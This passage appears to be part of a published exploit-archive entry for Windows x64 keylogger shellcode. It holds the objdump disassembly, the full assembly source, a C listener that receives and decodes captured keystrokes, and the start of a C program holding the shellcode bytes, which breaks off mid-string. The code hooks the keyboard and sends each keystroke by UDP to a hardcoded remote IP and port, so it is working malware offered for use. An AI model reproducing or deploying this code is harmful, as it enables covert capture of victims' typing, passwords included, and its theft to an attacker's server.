<get_addr+0x1d>\r\n 1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax\r\n 1ab: 74 4d je 1fa <get_addr+0xa>\r\n 1ad: 65 73 73 gs jae 223 <get_addr+0x33>\r\n 1b0: 61 (bad) \r\n 1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx\r\n 1b8: 6e outs dx,BYTE PTR ds:[rsi]\r\n 1b9: 73 6c jae 227 <get_addr+0x37>\r\n 1bb: 61 (bad) \r\n 1bc: 74 65 je 223 <get_addr+0x33>\r\n 1be: 4d rex.WRB\r\n 1bf: 65 73 73 gs jae 235 <get_addr+0x45>\r\n 1c2: 61 (bad) \r\n 1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax\r\n 1c9: 70 61 jo 22c <get_addr+0x3c>\r\n 1cb: 74 63 je 230 <get_addr+0x40>\r\n 1cd: 68 4d 65 73 73 push 0x7373654d\r\n 1d2: 61 (bad) \r\n 1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx\r\n \r\n00000000000001d7 <ws2_32_func>:\r\n 1d7: 57 push rdi\r\n 1d8: 53 push rbx\r\n 1d9: 41 53 push r11\r\n 1db: 74 61 je 23e <get_addr+0x4e>\r\n 1dd: 72 74 jb 253 <get_addr+0x63>\r\n 1df: 75 70 jne 251 <get_addr+0x61>\r\n 1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi\r\n 1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65]\r\n 1e7: 74 01 je 1ea <ws2_32_func+0x13>\r\n 1e9: 73 65 jae 250 <get_addr+0x60>\r\n 1eb: 6e outs dx,BYTE PTR ds:[rsi]\r\n 1ec: 64 74 6f fs je 25e <get_addr+0x6e>\r\n 1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx\r\n \r\n00000000000001f0 <get_addr>:\r\n 1f0: 56 push rsi\r\n 1f1: 57 push rdi\r\n 1f2: 41 50 push r8\r\n 1f4: 52 push rdx\r\n 1f5: 41 51 push r9\r\n 1f7: 51 push rcx\r\n 1f8: 41 5b pop r11\r\n 1fa: 48 31 db xor rbx,rbx\r\n 1fd: 53 push rbx\r\n 1fe: 53 push rbx\r\n 1ff: 5a pop rdx\r\n 200: 58 pop rax\r\n 201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c]\r\n 204: 48 01 cb add rbx,rcx\r\n 207: b2 88 mov dl,0x88\r\n 209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1]\r\n 20c: 48 01 c8 add rax,rcx\r\n 20f: 48 31 d2 xor rdx,rdx\r\n 212: 52 push rdx\r\n 213: 52 push rdx\r\n 214: 52 push rdx\r\n 215: 41 58 pop r8\r\n 217: 41 59 pop r9\r\n 219: 41 5a pop r10\r\n 21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]\r\n 21f: 4d 01 d8 add r8,r11\r\n 222: 44 8b 48 24 mov r9d,DWORD PTR 
[rax+0x24]\r\n 226: 4d 01 d9 add r9,r11\r\n 229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c]\r\n 22d: 4d 01 da add r10,r11\r\n 230: 48 31 d2 xor rdx,rdx\r\n 233: 48 31 f6 xor rsi,rsi\r\n 236: 56 push rsi\r\n 237: 59 pop rcx\r\n 238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4]\r\n 23c: 4c 01 de add rsi,r11\r\n 23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]\r\n 244: 48 31 c0 xor rax,rax\r\n 247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1]\r\n 24a: 48 ff c1 inc rcx\r\n 24d: 3c 01 cmp al,0x1\r\n 24f: 75 f6 jne 247 <get_addr+0x57>\r\n 251: 48 ff c2 inc rdx\r\n 254: 51 push rcx\r\n 255: 48 ff c9 dec rcx\r\n 258: 48 87 f7 xchg rdi,rsi\r\n 25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi]\r\n 25d: 59 pop rcx\r\n 25e: 75 d3 jne 233 <get_addr+0x43>\r\n 260: 48 ff ca dec rdx\r\n 263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8]\r\n 268: 48 01 cf add rdi,rcx\r\n 26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi\r\n 270: 48 31 db xor rbx,rbx\r\n 273: 53 push rbx\r\n 274: 58 pop rax\r\n 275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2]\r\n 27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4]\r\n 27e: 4c 01 d8 add rax,r11\r\n 281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp]\r\n 285: 48 89 03 mov QWORD PTR [rbx],rax\r\n 288: 48 83 c3 08 add rbx,0x8\r\n 28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx\r\n 290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]\r\n 295: 48 ff cb dec rbx\r\n 298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx\r\n 29d: 48 31 d2 xor rdx,rdx\r\n 2a0: 48 39 d3 cmp rbx,rdx\r\n 2a3: 75 8e jne 233 <get_addr+0x43>\r\n 2a5: 48 83 c4 18 add rsp,0x18\r\n 2a9: 5f pop rdi\r\n 2aa: 5e pop rsi\r\n 2ab: c3 ret \r\n \r\n00000000000002ac <_proceed_>:\r\n 2ac: 48 83 ec 58 sub rsp,0x58\r\n 2b0: 41 50 push r8\r\n 2b2: 52 push rdx\r\n 2b3: 51 push rcx\r\n 2b4: 48 31 f6 xor rsi,rsi\r\n 2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548\r\n 2be: 54 49 53 \r\n \r\n00000000000002c1 <find>:\r\n 2c1: 4c 8b 14 34 mov r10,QWORD PTR [rsp+rsi*1]\r\n 2c5: 48 ff c6 inc rsi\r\n 2c8: 49 39 c2 cmp r10,rax\r\n 2cb: 75 f4 jne 
2c1 <find>\r\n 2cd: 48 83 c6 07 add rsi,0x7\r\n 2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1]\r\n 2d5: 48 8b 3b mov rdi,QWORD PTR [rbx]\r\n 2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8]\r\n 2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10]\r\n 2e0: 48 85 c9 test rcx,rcx\r\n 2e3: 75 68 jne 34d <_out_>\r\n 2e5: 48 31 db xor rbx,rbx\r\n 2e8: b3 01 mov bl,0x1\r\n 2ea: 48 c1 e3 08 shl rbx,0x8\r\n 2ee: 48 39 da cmp rdx,rbx\r\n 2f1: 75 5a jne 34d <_out_>\r\n 2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]\r\n 2f7: 48 31 c9 xor rcx,rcx\r\n 2fa: b1 14 mov cl,0x14\r\n 2fc: ff d3 call rbx\r\n 2fe: 66 41 89 04 24 mov WORD PTR [r12],ax\r\n 303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20]\r\n 307: 48 31 c9 xor rcx,rcx\r\n 30a: b1 10 mov cl,0x10\r\n 30c: ff d3 call rbx\r\n 30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax\r\n 314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10]\r\n 319: 8b 03 mov eax,DWORD PTR [rbx]\r\n 31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax\r\n 320: 48 83 ec 58 sub rsp,0x58\r\n 324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8]\r\n 328: 41 54 push r12\r\n 32a: 5a pop rdx\r\n 32b: 4d 31 c9 xor r9,r9\r\n 32e: 41 51 push r9\r\n 330: 41 58 pop r8\r\n 332: 41 b0 10 mov r8b,0x10\r\n 335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15\r\n 33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8\r\n 33f: 49 83 e8 08 sub r8,0x8\r\n 343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50]\r\n 347: ff d3 call rbx\r\n 349: 48 83 c4 58 add rsp,0x58\r\n \r\n000000000000034d <_out_>:\r\n 34d: 5a pop rdx\r\n 34e: 41 58 pop r8\r\n 350: 41 59 pop r9\r\n 352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18]\r\n 356: 48 31 c9 xor rcx,rcx\r\n 359: ff d3 call rbx\r\n 35b: 48 83 c4 58 add rsp,0x58\r\n 35f: c3 ret \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n \r\n \r\n/*\r\nsection .text\r\n global _start\r\n_start:\r\n \r\njmp short p1\r\n \r\n_init_:\r\n \r\nxor rdx,rdx\r\nmov rax,[gs:rdx+0x60] ; getting pointer of PEB structure\r\nmov rax,[rax+24] ;rax=PPEB->Ldr\r\nmov rax,[rax+32] ;Ldr->InMemoryOrderModuleList\r\nmov 
rsi,[rax]\r\nmov rax,[rsi]\r\nmov rsi,[rax+32] ;kernel32.dll base address\r\n \r\npop rbx ;address of _p2_\r\n \r\npush rbx\r\nret; transferring execution control to _p2_\r\n \r\n \r\n \r\np1:\r\ncall _init_\r\n \r\n \r\n \r\n;-----------------------------------------------------------------------------------------------------\r\n \r\n_p2_:\r\n \r\n \r\npush rdx\r\npush rdx\r\nlea r15,[rsp]\r\nsub rsp,56\r\nlea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure )\r\nsub rsp,88\r\nlea rdi,[rsp] ; pointer to function address\r\n \r\n \r\n \r\npush r15\r\npush r12\r\npush rdi\r\nmov rax,'HEREITIS'\r\npush rax\r\n \r\nxor rax,rax\r\nmov ax,get_addr-_p2_\r\nadd rbx,rax ; address of get_addr\r\n \r\npush rbx ;reserving future use\r\n \r\nmov rcx,rsi\r\n \r\n \r\nlea rdx,[rbx-(get_addr-kernel32_func)]\r\n \r\n \r\nxor r8,r8\r\nmov r8b,2\r\nmov r9,rdi\r\ncall rbx ;loading kernel32_func functions\r\n \r\n \r\n;-------------------------------------------------------------------------------------\r\n \r\npop r13 ;address of get_addr\r\n \r\n;loading ws2_32.dll \r\n \r\nxor rax,rax\r\npush rax\r\npush rax\r\n \r\nmov rax,'ws2_32.d'\r\nmov [rsp],rax\r\nmov [rsp+8],word 'll'\r\nlea rcx,[rsp]\r\nmov rsi,[rdi+8]\r\nsub rsp,40\r\n \r\ncall rsi\r\nxchg rsi,rax\r\n \r\n;----------------------------------------------------------\r\n;loading user32.dll\r\nlea rcx,[rsp+40]\r\nmov [rcx],dword 'user'\r\n \r\ncall rax\r\n \r\n \r\n;====================================\r\n;loading user32.dll functions\r\nmov rcx,rax\r\nlea rdx,[r13-(get_addr-user32_func)]\r\nxor r8,r8\r\nmov r8b,6\r\nlea r9,[rdi+16] ;user32.dll functions from 16\r\ncall r13\r\n \r\n;===================================\r\n;loading ws2_32.dll functions\r\n \r\nmov rcx,rsi\r\nlea rdx,[r13-(get_addr-ws2_32_func)]\r\nxor r8,r8\r\nmov r8b,3\r\nlea r9,[rdi+64] ;ws2_32.dll functions from 64\r\ncall r13\r\n \r\nadd rsp,56\r\n;===========================================All necessary functions are 
loaded. Time to proceed to main task ========================================\r\n \r\n_p3_:\r\n \r\nxor rcx,rcx\r\nmov cx,408\r\nsub rsp,rcx\r\nadd rcx,106\r\nlea rdx,[rsp]\r\nmov rbx,[rdi+64] ;WSAStartup()\r\n \r\ncall rbx\r\n \r\n \r\nxor rcx,rcx\r\n \r\n \r\n \r\n \r\nmov cl,2\r\npush rcx\r\npush rcx\r\npop rdx\r\npop r8\r\nmov r8b,17\r\nmov rbx,[rdi+72] ;socket()\r\ncall rbx\r\n \r\nmov [rdi+8],rax ;SOCKET\r\n \r\n \r\n \r\n \r\n \r\nmov rbx,[rdi] ; GetModuleHandleA()\r\nxor rcx,rcx\r\ncall rbx\r\n \r\n;------------------------------------\r\n \r\nmov [r15],byte 2\r\nmov [r15+2],word 0x83db ;port change it\r\nmov [r15+4],dword 0x63c1a1c1 ;IP change it\r\n \r\n;-----------------------------------\r\n \r\n \r\n \r\n \r\nxor r9,r9\r\npush r9\r\npush r9\r\npop rcx\r\npop rdx\r\nmov cl,13\r\nmov r8,rax\r\nmov dl,_proceed_-get_addr\r\nadd rdx,r13 \r\nmov rbx,[rdi+16] ;SetWindowsHookExA()\r\n \r\ncall rbx\r\n \r\n \r\n \r\n_p4_:\r\n \r\nlea rcx,[r12+8]\r\nxor rdx,rdx\r\npush rdx\r\npush rdx\r\npop r8\r\npop r9\r\nmov rbx,[rdi+40] ;GetMessageA()\r\n \r\n \r\n \r\ncall rbx\r\n \r\n \r\n \r\n \r\nlea rcx,[r12+8]\r\nmov rbx,[rdi+48] ;TranslateMessage() \r\n \r\ncall rbx\r\n \r\nlea rcx,[r12+8]\r\nmov rbx,[rdi+56] ;DispatchMessageA()\r\n \r\ncall rbx\r\n \r\n \r\njmp short _p4_\r\n \r\n \r\n \r\n;----------------------------------------------------------------------------------------\r\nkernel32_func:\r\ndb 'GetModuleHandleA',1,'LoadLibraryA',1\r\n \r\n \r\nuser32_func:\r\ndb 'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1\r\n \r\nws2_32_func:\r\ndb 'WSAStartup',1,'socket',1,'sendto',1\r\n \r\n \r\nget_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer \r\ndb 
0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3\r\n \r\n;-------------------------------------------------------------------------------------------------------------------\r\n_proceed_:\r\n \r\nsub rsp,88\r\npush r8\r\npush rdx\r\npush rcx\r\n \r\n \r\n \r\n \r\n;---------------------------------------------\r\nxor rsi,rsi\r\nmov rax,'HEREITIS'\r\nfind:\r\n \r\n \r\nmov r10,[rsp+rsi]\r\ninc rsi\r\ncmp r10,rax\r\njne find\r\n \r\nadd rsi,7\r\nlea rbx,[rsp+rsi]\r\nmov rdi,[rbx]\r\nmov r12,[rbx+8]\r\nmov r15,[rbx+16]\r\n \r\n \r\n;------------------------------------------------\r\ntest rcx,rcx\r\njnz short _out_\r\n \r\nxor rbx,rbx\r\nmov bl,1\r\nshl rbx,8\r\n \r\ncmp rdx,rbx\r\njne short _out_\r\n \r\n \r\n;--------------------------------------------------------\r\n \r\nmov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL)\r\nxor rcx,rcx\r\nmov cl,0x14\r\ncall rbx\r\n \r\nmov [r12],ax\r\n \r\nmov rbx,[rdi+32] ;GetKeyState(VK_SHIFT)\r\nxor rcx,rcx\r\nmov cl,0x10\r\ncall rbx\r\n \r\nmov [r12+2],ax\r\n \r\n \r\n \r\n \r\n;-------------------------------\r\n;sending keystrokes\r\nmov rbx,[rsp+16]\r\nmov 
eax,[rbx]\r\nmov [r12+4],eax ;Virtual key code\r\n \r\nsub rsp,88\r\nmov rcx,[rdi+8] ;SOCKET\r\npush r12\r\npop rdx\r\n \r\nxor r9,r9\r\npush r9\r\n \r\npop r8\r\nmov r8b,16\r\nmov [rsp+32],r15\r\nmov [rsp+40],r8\r\nsub r8,8\r\n \r\nmov rbx,[rdi+80]\r\ncall rbx\r\nadd rsp,88\r\n \r\n \r\n;-----------------------------------------------------------\r\n \r\n_out_:\r\n \r\npop rdx\r\npop r8\r\npop r9\r\n \r\n \r\nmov rbx,[rdi+24]\r\n \r\nxor rcx,rcx\r\n \r\ncall rbx\r\n \r\n \r\nadd rsp,88\r\n \r\n \r\nret\r\n \r\n \r\n \r\n \r\n \r\n \r\n*/\r\n \r\n \r\n/*\r\n \r\n//keylogger Handler\r\n \r\n#include<stdio.h>\r\n#include<winsock2.h>\r\n#include<windows.h>\r\n \r\n#pragma pack(1)\r\n \r\ntypedef struct key\r\n{\r\n short caps;\r\n short shift;\r\n DWORD vkcode;\r\n}KEYDATA;\r\n \r\n \r\nchar * Determine(BOOL caps,BOOL shift,DWORD code)\r\n{\r\n char * key;\r\n switch (code) // SWITCH ON INT\r\n {\r\n case 0x41: key = caps ? (shift ? \"a\" : \"A\") : (shift ? \"A\" : \"a\"); break;\r\n case 0x42: key = caps ? (shift ? \"b\" : \"B\") : (shift ? \"B\" : \"b\"); break;\r\n case 0x43: key = caps ? (shift ? \"c\" : \"C\") : (shift ? \"C\" : \"c\"); break;\r\n case 0x44: key = caps ? (shift ? \"d\" : \"D\") : (shift ? \"D\" : \"d\"); break;\r\n case 0x45: key = caps ? (shift ? \"e\" : \"E\") : (shift ? \"E\" : \"e\"); break;\r\n case 0x46: key = caps ? (shift ? \"f\" : \"F\") : (shift ? \"F\" : \"f\"); break;\r\n case 0x47: key = caps ? (shift ? \"g\" : \"G\") : (shift ? \"G\" : \"g\"); break;\r\n case 0x48: key = caps ? (shift ? \"h\" : \"H\") : (shift ? \"H\" : \"h\"); break;\r\n case 0x49: key = caps ? (shift ? \"i\" : \"I\") : (shift ? \"I\" : \"i\"); break;\r\n case 0x4A: key = caps ? (shift ? \"j\" : \"J\") : (shift ? \"J\" : \"j\"); break;\r\n case 0x4B: key = caps ? (shift ? \"k\" : \"K\") : (shift ? \"K\" : \"k\"); break;\r\n case 0x4C: key = caps ? (shift ? \"l\" : \"L\") : (shift ? \"L\" : \"l\"); break;\r\n case 0x4D: key = caps ? (shift ? 
\"m\" : \"M\") : (shift ? \"M\" : \"m\"); break;\r\n case 0x4E: key = caps ? (shift ? \"n\" : \"N\") : (shift ? \"N\" : \"n\"); break;\r\n case 0x4F: key = caps ? (shift ? \"o\" : \"O\") : (shift ? \"O\" : \"o\"); break;\r\n case 0x50: key = caps ? (shift ? \"p\" : \"P\") : (shift ? \"P\" : \"p\"); break;\r\n case 0x51: key = caps ? (shift ? \"q\" : \"Q\") : (shift ? \"Q\" : \"q\"); break;\r\n case 0x52: key = caps ? (shift ? \"r\" : \"R\") : (shift ? \"R\" : \"r\"); break;\r\n case 0x53: key = caps ? (shift ? \"s\" : \"S\") : (shift ? \"S\" : \"s\"); break;\r\n case 0x54: key = caps ? (shift ? \"t\" : \"T\") : (shift ? \"T\" : \"t\"); break;\r\n case 0x55: key = caps ? (shift ? \"u\" : \"U\") : (shift ? \"U\" : \"u\"); break;\r\n case 0x56: key = caps ? (shift ? \"v\" : \"V\") : (shift ? \"V\" : \"v\"); break;\r\n case 0x57: key = caps ? (shift ? \"w\" : \"W\") : (shift ? \"W\" : \"w\"); break;\r\n case 0x58: key = caps ? (shift ? \"x\" : \"X\") : (shift ? \"X\" : \"x\"); break;\r\n case 0x59: key = caps ? (shift ? \"y\" : \"Y\") : (shift ? \"Y\" : \"y\"); break;\r\n case 0x5A: key = caps ? (shift ? \"z\" : \"Z\") : (shift ? 
\"Z\" : \"z\"); break;\r\n // Sleep Key\r\n case VK_SLEEP: key = \"[SLEEP]\"; break;\r\n // Num Keyboard \r\n case VK_NUMPAD0: key = \"0\"; break;\r\n case VK_NUMPAD1: key = \"1\"; break;\r\n case VK_NUMPAD2 : key = \"2\"; break;\r\n case VK_NUMPAD3: key = \"3\"; break;\r\n case VK_NUMPAD4: key = \"4\"; break;\r\n case VK_NUMPAD5: key = \"5\"; break;\r\n case VK_NUMPAD6: key = \"6\"; break;\r\n case VK_NUMPAD7: key = \"7\"; break;\r\n case VK_NUMPAD8: key = \"8\"; break;\r\n case VK_NUMPAD9: key = \"9\"; break;\r\n case VK_MULTIPLY: key = \"*\"; break;\r\n case VK_ADD: key = \"+\"; break;\r\n case VK_SEPARATOR: key = \"-\"; break;\r\n case VK_SUBTRACT: key = \"-\"; break;\r\n case VK_DECIMAL: key = \".\"; break;\r\n case VK_DIVIDE: key = \"/\"; break;\r\n // Function Keys\r\n case VK_F1: key = \"[F1]\"; break;\r\n case VK_F2: key = \"[F2]\"; break;\r\n case VK_F3: key = \"[F3]\"; break;\r\n case VK_F4: key = \"[F4]\"; break;\r\n case VK_F5: key = \"[F5]\"; break;\r\n case VK_F6: key = \"[F6]\"; break;\r\n case VK_F7: key = \"[F7]\"; break;\r\n case VK_F8: key = \"[F8]\"; break;\r\n case VK_F9: key = \"[F9]\"; break;\r\n case VK_F10: key = \"[F10]\"; break;\r\n case VK_F11: key = \"[F11]\"; break;\r\n case VK_F12: key = \"[F12]\"; break;\r\n case VK_F13: key = \"[F13]\"; break;\r\n case VK_F14: key = \"[F14]\"; break;\r\n case VK_F15: key = \"[F15]\"; break;\r\n case VK_F16: key = \"[F16]\"; break;\r\n case VK_F17: key = \"[F17]\"; break;\r\n case VK_F18: key = \"[F18]\"; break;\r\n case VK_F19: key = \"[F19]\"; break;\r\n case VK_F20: key = \"[F20]\"; break;\r\n case VK_F21: key = \"[F22]\"; break;\r\n case VK_F22: key = \"[F23]\"; break;\r\n case VK_F23: key = \"[F24]\"; break;\r\n case VK_F24: key = \"[F25]\"; break;\r\n // Keys\r\n case VK_NUMLOCK: key = \"[NUM-LOCK]\"; break;\r\n case VK_SCROLL: key = \"[SCROLL-LOCK]\"; break;\r\n case VK_BACK: key = \"[BACK]\"; break;\r\n case VK_TAB: key = \"[TAB]\"; break;\r\n case VK_CLEAR: key = \"[CLEAR]\"; break;\r\n 
case VK_RETURN: key = \"[ENTER]\"; break;\r\n case VK_SHIFT: key = \"[SHIFT]\"; break;\r\n case VK_CONTROL: key = \"[CTRL]\"; break;\r\n case VK_MENU: key = \"[ALT]\"; break;\r\n case VK_PAUSE: key = \"[PAUSE]\"; break;\r\n case VK_CAPITAL: key = \"[CAP-LOCK]\"; break;\r\n case VK_ESCAPE: key = \"[ESC]\"; break;\r\n case VK_SPACE: key = \"[SPACE]\"; break;\r\n case VK_PRIOR: key = \"[PAGEUP]\"; break;\r\n case VK_NEXT: key = \"[PAGEDOWN]\"; break;\r\n case VK_END: key = \"[END]\"; break;\r\n case VK_HOME: key = \"[HOME]\"; break;\r\n case VK_LEFT: key = \"[LEFT]\"; break;\r\n case VK_UP: key = \"[UP]\"; break;\r\n case VK_RIGHT: key = \"[RIGHT]\"; break;\r\n case VK_DOWN: key = \"[DOWN]\"; break;\r\n case VK_SELECT: key = \"[SELECT]\"; break;\r\n case VK_PRINT: key = \"[PRINT]\"; break;\r\n case VK_SNAPSHOT: key = \"[PRTSCRN]\"; break;\r\n case VK_INSERT: key = \"[INS]\"; break;\r\n case VK_DELETE: key = \"[DEL]\"; break;\r\n case VK_HELP: key = \"[HELP]\"; break;\r\n // Number Keys with shift\r\n case 0x30: key = shift ? \")\" : \"0\"; break; \r\n case 0x31: key = shift ? \"!\" : \"1\"; break;\r\n case 0x32: key = shift ? \"@\" : \"2\"; break;\r\n case 0x33: key = shift ? \"#\" : \"3\"; break;\r\n case 0x34: key = shift ? \"$\" : \"4\"; break;\r\n case 0x35: key = shift ? \"%\" : \"5\"; break;\r\n case 0x36: key = shift ? \"^\" : \"6\"; break;\r\n case 0x37: key = shift ? \"&\" : \"7\"; break;\r\n case 0x38: key = shift ? \"*\" : \"8\"; break;\r\n case 0x39: key = shift ? \"(\" : \"9\"; break;\r\n // Windows Keys\r\n case VK_LWIN: key = \"[WIN]\"; break;\r\n case VK_RWIN: key = \"[WIN]\"; break;\r\n case VK_LSHIFT: key = \"[SHIFT]\"; break;\r\n case VK_RSHIFT: key = \"[SHIFT]\"; break;\r\n case VK_LCONTROL: key = \"[CTRL]\"; break;\r\n case VK_RCONTROL: key = \"[CTRL]\"; break;\r\n // OEM Keys with shift \r\n case VK_OEM_1: key = shift ? \":\" : \";\"; break;\r\n case VK_OEM_PLUS: key = shift ? \"+\" : \"=\"; break;\r\n case VK_OEM_COMMA: key = shift ? 
\"<\" : \",\"; break; \r\n case VK_OEM_MINUS: key = shift ? \"_\" : \"-\"; break;\r\n case VK_OEM_PERIOD: key = shift ? \">\" : \".\"; break;\r\n case VK_OEM_2: key = shift ? \"?\" : \"/\"; break;\r\n case VK_OEM_3: key = shift ? \"~\" : \"`\"; break;\r\n case VK_OEM_4: key = shift ? \"{\" : \"[\"; break;\r\n case VK_OEM_5: key = shift ? \"|\" : \"\\\\\"; break;\r\n case VK_OEM_6: key = shift ? \"}\" : \"]\"; break;\r\n case VK_OEM_7: key = shift ? \"\\\"\" : \"'\"; break; //TODO: Escape this char: \"\r\n // Action Keys\r\n case VK_PLAY: key = \"[PLAY]\";break;\r\n case VK_ZOOM: key = \"[ZOOM]\";break;\r\n case VK_OEM_CLEAR: key = \"[CLEAR]\";break;\r\n case VK_CANCEL: key = \"[CTRL-C]\";break;\r\n \r\n default: key = \"[UNK-KEY]\";break;\r\n }\r\n return key;\r\n}\r\n \r\n \r\n \r\nint main()\r\n{\r\n int port;\r\n SOCKET s;\r\n struct sockaddr_in sr,cr;\r\n WSADATA wsa;\r\n KEYDATA keystrk;\r\n char * n;\r\n \r\n printf(\"Enter Port Number To Listen: \");\r\n scanf(\"%d\",&port);\r\n \r\n if(WSAStartup(514,&wsa))\r\n {\r\n printf(\"WSAStartup() Failed\");\r\n return 0;\r\n }\r\n \r\n if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)\r\n {\r\n printf(\"Failed To Create Socket...\");\r\n return 0;\r\n }\r\n \r\n ZeroMemory(&sr,16);\r\n sr.sin_family=AF_INET;\r\n sr.sin_port=htons(port);\r\n \r\n if(bind(s,(struct sockaddr *)&sr,16))\r\n {\r\n printf(\"Failed To Bind..\");\r\n return 0;\r\n }\r\n \r\n port=16; //Why bother to declare a variable for int * fromlen\r\n while(1)\r\n {\r\n recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port);\r\n n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode);\r\n printf(\"%s\",n);\r\n }\r\n return 0;\r\n}\r\n \r\n \r\n \r\n*/\r\n \r\n \r\n#include<windows.h>\r\n#include<stdio.h>\r\n#include<string.h>\r\n#include<tlhelp32.h>\r\n \r\nchar 
shellcode[]=\"\\xeb\\x1d\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x40\\x18\\x48\\x8b\\x40\\x20\\x48\\x8b\\x30\\x48\\x8b\\x06\\x48\\x8b\\x70\\x20\\x5b\\x53\\xc3\\xe8\\xde\\xff\\xff\\xff\\x52\\x52\\x4c\\x8d\\x3c\\x24\\x48\\x83\\xec\\x38\\x4c\\x8d\\x24\\x24\\x48\\x83\\xec\\x58\\x48\\x8d\\x3c\\x24\\x41\\x57\\x41\\x54\\x57\\x48\\xb8\\x48\\x45\\x52\\x45\\x49\\x54\\x49\\x53\\x50\\x48\\x31\\xc0\\x66\\xb8\\xcc\\x01\\x48\\x01\\xc3\\x53\\x48\\x89\\xf1\\x48\\x8d\\x93\\x6e\\xff\\xff\\xff\\x4d\\x31\\xc0\\x41\\xb0\\x02\\x49\\x89\\xf9\\xff\\xd3\\x41\\x5d\\x48\\x31\\xc0\\x50\\x50\\x48\\xb8\\x77\\x73\\x32\\x5f\\x33\\x32\\x2e\\x64\\x48\\x89\\x04\\x24\\x66\\xc7\\x44\\x24\\x08\\x6c\\x6c\\x48\\x8d\\x0c\\x24\\x48\\x8b\\x77\\x08\\x48\\x83\\xec\\x28\\xff\\xd6\\x48\\x96\\x48\\x8d\\x4c\\x24\\x28\\xc7\\x01\\x75\\x73\\x65\\x72\\xff\\xd0\\x48\\x89\\xc1\\x49\\x8d\\x55\\x8c\\x4d\\x31\\xc0\\x41\\xb0\\x06\\x4c\\x8d\\x4f\\x10\\x41\\xff\\xd5\\x48\\x89\\xf1\\x49\\x8d\\x55\\xe7\\x4d\\x31\\xc0\\x41\\xb0\\x03\\x4c\\x8d\\x4f\\x40\\x41\\xff\\xd5\\x48\\x83\\xc4\\x38\\x48\\x31\\xc9\\x66\\xb9\\x98\\x01\\x48\\x29\\xcc\\x48\\x83\\xc1\\x6a\\x48\\x8d\\x14\\x24\\x48\\x8b\\x5f\\x40\\xff\\xd3\\x48\\x31\\xc9\\xb1\\x02\\x51\\x51\\x5a\\x41\\x5